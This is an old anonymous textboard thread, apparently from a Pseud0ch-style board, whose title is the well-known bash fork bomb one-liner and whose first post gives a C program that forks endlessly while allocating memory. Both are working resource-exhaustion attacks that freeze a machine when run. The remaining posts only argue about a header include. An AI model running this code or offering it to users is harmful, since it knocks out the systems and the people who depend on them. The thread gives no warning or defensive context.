Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon. Entire thread

:(){ :|:& };:

Name: Anonymous 2008-11-22 14:19

#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    for(;;)
    {
        fork();
        malloc(1024);
    }
    return 0;
}

Name: Anonymous 2008-11-22 14:27

You don't need to include unistd.h, loser.

Name: 3 2008-11-22 14:28

Nevermind, it appears RMS is fucking us again and we have to include unistd.h.

Newer Posts
Don't change these.
Name: Email:
Entire Thread Thread List